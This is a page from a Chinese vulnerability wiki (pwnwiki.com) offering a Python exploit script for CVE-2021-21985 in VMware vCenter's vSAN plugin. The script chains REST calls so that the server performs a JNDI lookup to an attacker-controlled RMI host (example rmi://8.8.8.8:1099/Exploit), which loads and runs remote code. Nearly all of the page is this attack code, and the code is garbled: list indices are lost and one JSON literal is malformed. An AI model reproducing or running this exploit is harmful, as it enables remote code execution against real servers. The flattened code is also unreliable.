免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
EXP
import requests import sys import json def send_request(host,uri,json): try: req = requests.post(url=host+baseuri+uri,json=json,headers=headers,verify=False) return req.text except: return False def check_false(request): if request ==False or 'result' not in request: print("* No Vuln!") return True if __name__ == '__main__': if len(sys.argv) < 2: print('''python3 cve-2021-21985.py https://host rmi://8.8.8.8:1099/Exploit''') sys.exit() host = sys.argv1 payload = sys.argv2 baseuri = "ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService" uris = "/setTargetObject", "/setStaticMethod", "/setTargetMethod", "/setArguments", "/prepare", "/invoke" headers = {'Content-Type': 'application/json', "User-Agent": "pentest"} stage_setTargetObject = json.loads('{"methodInput":null}') stage_setStaticMethod = json.loads('{"methodInput":"javax.naming.InitialContext.doLookup"}') stage_setTargetMethod = json.loads('{"methodInput":"doLookup"}') stage_setArguments = json.loads('{"methodInput":"%s"}'%payload) stage_prepare = json.loads('{"methodInput":}') print("* start init TargetObject") # init TargetObject init_request = send_request(host,uris0,json=stage_setTargetObject) if check_false(init_request): print("* init failed!") exit() # Step2 setStaticMethod StaticMethod = send_request(host,uris1,json=stage_setStaticMethod) if check_false(init_request): print("* StaticMethod init failed!") exit() # Step3 setTargetMethod StaticMethod = send_request(host,uris2,json=stage_setTargetMethod) if check_false(init_request): print("* setTarget Method failed!") exit() # Step4 setArguments # print(stage_setArguments) setArguments = send_request(host,uris3,json=stage_setArguments) if check_false(init_request): print("* setArguments failstage_setArgumentsed!") exit() # Step5 prepare setArguments = send_request(host,uris4,json=stage_prepare) if check_false(init_request): print("* stage_prepare failed!") exit() # Step6 invoke setArguments = send_request(host,uris5,json=stage_prepare) if check_false(init_request): print("* invoke failed!") exit()
免费、自由、人人可编辑的漏洞库